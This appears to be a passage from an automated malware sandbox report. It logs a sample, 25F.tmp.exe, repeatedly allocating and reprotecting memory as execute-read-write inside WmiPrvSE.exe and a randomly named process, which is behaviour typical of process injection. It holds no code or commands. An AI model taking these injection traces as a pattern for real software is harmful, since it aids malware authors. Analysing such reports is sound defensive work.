            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 100000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 3E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 280000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 5F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 2B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 130000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 8A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 100000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 1D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 180000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 1C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 8E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 410000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 130000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 140000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 3A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 160000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 130000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 140000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 190000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 100000 protect: page execute and read and writeJump to behavior
            Changes memory attributes in foreign processes to executable or writable
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 1B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 1B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: C50000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: C50000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 180000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 180000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 3D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 180000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 380000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 180000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 180000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 410000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 1B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 350000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 310000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 130000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 130000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 380000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 100000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 100000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 100000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 100000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 210000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 210000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 220000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 220000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 1B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 1B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 320000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 320000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 510000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 510000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 190000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 190000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 840000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 840000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 400000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 400000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 90000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 90000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 820000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 90000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 180000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 180000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 5D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 5D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 90000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 910000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 910000 protect: page execute and read and writeJump to behavior
